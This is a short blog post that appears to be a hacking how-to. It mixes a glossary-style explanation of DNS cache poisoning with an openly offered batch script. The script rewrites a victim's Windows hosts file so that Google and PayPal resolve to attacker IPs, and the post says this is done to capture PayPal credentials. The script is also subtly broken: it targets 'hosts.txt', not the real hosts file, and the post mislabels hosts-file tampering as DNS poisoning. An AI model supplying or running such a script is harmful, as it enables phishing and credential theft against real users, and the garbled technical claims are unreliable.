DNS Poisoning Attack (◕_◕)
What is DNS Poisoning
Cache poisoning, also called domain name system (DNS) poisoning or DNS cache poisoning, is the corruption of an Internet server's domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. At that point, a worm, spyware, Web browser hijacking program, or other malware can be downloaded to the user's computer from the rogue location.
Cache poisoning can be transmitted in a variety of ways, increasing the rate at which rogue programs are spread. One tactic is the placement of compromised URLs within spam e-mail messages having subject lines that tempt users to open the message (for example, "Serious error in your tax return"). Images and banner ads within e-mail messages can also be vehicles by which users are directed to servers that have been compromised by cache poisoning. Once an end user's computer has been infected with the nefarious code, all future requests by that user's computer for the compromised URL will be redirected to the bad IP address -- even if the "victim" server resolves the problem at its site. Cache poisoning is particularly dangerous when the targets are well-known and trusted sites, such as those to which browsers are pointed when automatic virus-definition updates are performed.
In simple words it's just an awesome attack try it you will really like it.
1. Just open up a notepad, copy and paste the below code
@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit
2. Save it as a batch file with the extension .bat
3. Then run it on the Victims computer to infect it.
4. This program creates a new entry in the hosts file, so that whenever an user attempts to move to www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.
No comments:
Post a Comment